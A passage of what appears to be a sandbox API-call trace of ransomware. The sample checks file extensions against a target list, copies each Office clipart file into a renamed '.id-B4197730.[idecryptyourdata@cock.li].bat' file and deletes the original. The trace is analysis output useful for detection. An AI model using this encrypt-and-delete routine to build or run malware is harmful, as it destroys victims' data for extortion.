[0182.558] lstrlenW (lpString=".docx") returned 5 [0182.558] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.558] lstrlenW (lpString=".pdf") returned 4 [0182.558] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.558] lstrlenW (lpString=".xls") returned 4 [0182.558] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.558] lstrlenW (lpString=".xlsx") returned 5 [0182.558] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.558] lstrlenW (lpString=".ppt") returned 4 [0182.558] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.558] lstrlenW (lpString=".zip") returned 4 [0182.558] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.558] lstrlenW (lpString=".rar") returned 4 [0182.558] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.558] lstrlenW (lpString=".bz2") returned 4 [0182.558] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.558] lstrlenW (lpString=".7z") returned 3 [0182.558] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.559] lstrlenW (lpString=".dbf") returned 4 [0182.559] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.559] lstrlenW (lpString=".1cd") returned 4 [0182.559] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.559] lstrlenW (lpString=".jpg") returned 4 [0182.559] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.559] lstrlenW (lpString=".doc") returned 4 [0182.559] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.559] lstrlenW (lpString=".docx") returned 5 [0182.559] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.559] lstrlenW (lpString=".pdf") returned 4 [0182.559] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.559] lstrlenW (lpString=".xls") returned 4 [0182.559] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.559] lstrlenW (lpString=".xlsx") returned 5 [0182.559] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.559] lstrlenW (lpString=".ppt") returned 4 [0182.559] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.559] lstrlenW (lpString=".zip") returned 4 [0182.559] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.559] lstrlenW (lpString=".rar") returned 4 [0182.559] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.559] lstrlenW (lpString=".bz2") returned 4 [0182.560] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.560] lstrlenW (lpString=".7z") returned 3 [0182.560] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.560] lstrlenW (lpString=".dbf") returned 4 [0182.560] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.560] lstrlenW (lpString=".1cd") returned 4 [0182.560] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.560] lstrlenW (lpString=".jpg") returned 4 [0182.560] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.560] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.560] lstrlenW (lpString="J0106816.WMF") returned 12 [0182.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.561] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=3332) returned 1 [0182.561] CloseHandle (hObject=0x360) returned 1 [0182.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf")) returned 0x220 [0182.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.561] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.561] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.562] GetLastError () returned 0x0 [0182.562] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xd04, lpOverlapped=0x0) returned 1 [0182.564] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xd10, lpOverlapped=0x0) returned 1 [0182.567] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.567] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.567] SetEndOfFile (hFile=0x368) returned 1 [0182.567] CloseHandle (hObject=0x368) returned 1 [0182.567] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.567] SetEndOfFile (hFile=0x360) returned 1 [0182.568] CloseHandle (hObject=0x360) returned 1 [0182.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.568] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf")) returned 1 [0182.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.569] lstrlenW (lpString=".doc") returned 4 [0182.569] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.569] lstrlenW (lpString=".docx") returned 5 [0182.569] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.569] lstrlenW (lpString=".pdf") returned 4 [0182.569] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.569] lstrlenW (lpString=".xls") returned 4 [0182.569] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.569] lstrlenW (lpString=".xlsx") returned 5 [0182.569] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.569] lstrlenW (lpString=".ppt") returned 4 [0182.569] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.569] lstrlenW (lpString=".zip") returned 4 [0182.569] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.569] lstrlenW (lpString=".rar") returned 4 [0182.569] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.569] lstrlenW (lpString=".bz2") returned 4 [0182.569] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.569] lstrlenW (lpString=".7z") returned 3 [0182.569] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.569] lstrlenW (lpString=".dbf") returned 4 [0182.569] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.570] lstrlenW (lpString=".1cd") returned 4 [0182.570] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.570] lstrlenW (lpString=".jpg") returned 4 [0182.570] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.570] lstrlenW (lpString=".doc") returned 4 [0182.570] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.570] lstrlenW (lpString=".docx") returned 5 [0182.570] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.570] lstrlenW (lpString=".pdf") returned 4 [0182.570] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.570] lstrlenW (lpString=".xls") returned 4 [0182.570] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.570] lstrlenW (lpString=".xlsx") returned 5 [0182.570] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.570] lstrlenW (lpString=".ppt") returned 4 [0182.570] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.570] lstrlenW (lpString=".zip") returned 4 [0182.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.570] lstrlenW (lpString=".rar") returned 4 [0182.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.570] lstrlenW (lpString=".bz2") returned 4 [0182.570] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.570] lstrlenW (lpString=".7z") returned 3 [0182.571] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.571] lstrlenW (lpString=".dbf") returned 4 [0182.571] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.571] lstrlenW (lpString=".1cd") returned 4 [0182.571] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF") returned 68 [0182.571] lstrlenW (lpString=".jpg") returned 4 [0182.571] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.571] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.571] lstrlenW (lpString="J0106958.WMF") returned 12 [0182.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.571] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=13784) returned 1 [0182.572] CloseHandle (hObject=0x360) returned 1 [0182.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf")) returned 0x220 [0182.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.572] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.572] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.573] GetLastError () returned 0x0 [0182.573] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x35d8, lpOverlapped=0x0) returned 1 [0182.866] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x35e0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x35e0, lpOverlapped=0x0) returned 1 [0182.867] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.867] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.868] SetEndOfFile (hFile=0x368) returned 1 [0182.868] CloseHandle (hObject=0x368) returned 1 [0182.868] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.868] SetEndOfFile (hFile=0x360) returned 1 [0182.869] CloseHandle (hObject=0x360) returned 1 [0182.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.869] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf")) returned 1 [0182.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.869] lstrlenW (lpString=".doc") returned 4 [0182.869] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.869] lstrlenW (lpString=".docx") returned 5 [0182.869] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.869] lstrlenW (lpString=".pdf") returned 4 [0182.869] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.869] lstrlenW (lpString=".xls") returned 4 [0182.869] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.869] lstrlenW (lpString=".xlsx") returned 5 [0182.869] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.869] lstrlenW (lpString=".ppt") returned 4 [0182.870] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.870] lstrlenW (lpString=".zip") returned 4 [0182.870] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.870] lstrlenW (lpString=".rar") returned 4 [0182.870] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.870] lstrlenW (lpString=".bz2") returned 4 [0182.870] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.870] lstrlenW (lpString=".7z") returned 3 [0182.870] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.870] lstrlenW (lpString=".dbf") returned 4 [0182.870] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.870] lstrlenW (lpString=".1cd") returned 4 [0182.870] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.870] lstrlenW (lpString=".jpg") returned 4 [0182.870] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.870] lstrlenW (lpString=".doc") returned 4 [0182.870] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.870] lstrlenW (lpString=".docx") returned 5 [0182.870] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.870] lstrlenW (lpString=".pdf") returned 4 [0182.870] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.870] lstrlenW (lpString=".xls") returned 4 [0182.870] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.870] lstrlenW (lpString=".xlsx") returned 5 [0182.870] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.870] lstrlenW (lpString=".ppt") returned 4 [0182.870] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.871] lstrlenW (lpString=".zip") returned 4 [0182.871] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.871] lstrlenW (lpString=".rar") returned 4 [0182.871] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.871] lstrlenW (lpString=".bz2") returned 4 [0182.871] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.871] lstrlenW (lpString=".7z") returned 3 [0182.871] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.871] lstrlenW (lpString=".dbf") returned 4 [0182.871] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.871] lstrlenW (lpString=".1cd") returned 4 [0182.871] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 68 [0182.871] lstrlenW (lpString=".jpg") returned 4 [0182.871] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.871] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.871] lstrlenW (lpString="J0107154.WMF") returned 12 [0182.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.872] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=22300) returned 1 [0182.872] CloseHandle (hObject=0x360) returned 1 [0182.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf")) returned 0x220 [0182.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.872] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.872] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.873] GetLastError () returned 0x0 [0182.873] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x571c, lpOverlapped=0x0) returned 1 [0182.876] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x5720, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x5720, lpOverlapped=0x0) returned 1 [0182.877] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.877] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.877] SetEndOfFile (hFile=0x368) returned 1 [0182.877] CloseHandle (hObject=0x368) returned 1 [0182.878] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.878] SetEndOfFile (hFile=0x360) returned 1 [0182.878] CloseHandle (hObject=0x360) returned 1 [0182.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.879] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf")) returned 1 [0182.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 68 [0182.879] lstrlenW (lpString=".doc") returned 4 [0182.879] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.879] lstrlenW (lpString=".docx") returned 5 [0182.879] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.879] lstrlenW (lpString=".pdf") returned 4 [0182.879] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.879] lstrlenW (lpString=".xls") returned 4 [0182.879] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.879] lstrlenW (lpString=".xlsx") returned 5 [0182.879] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.879] lstrlenW 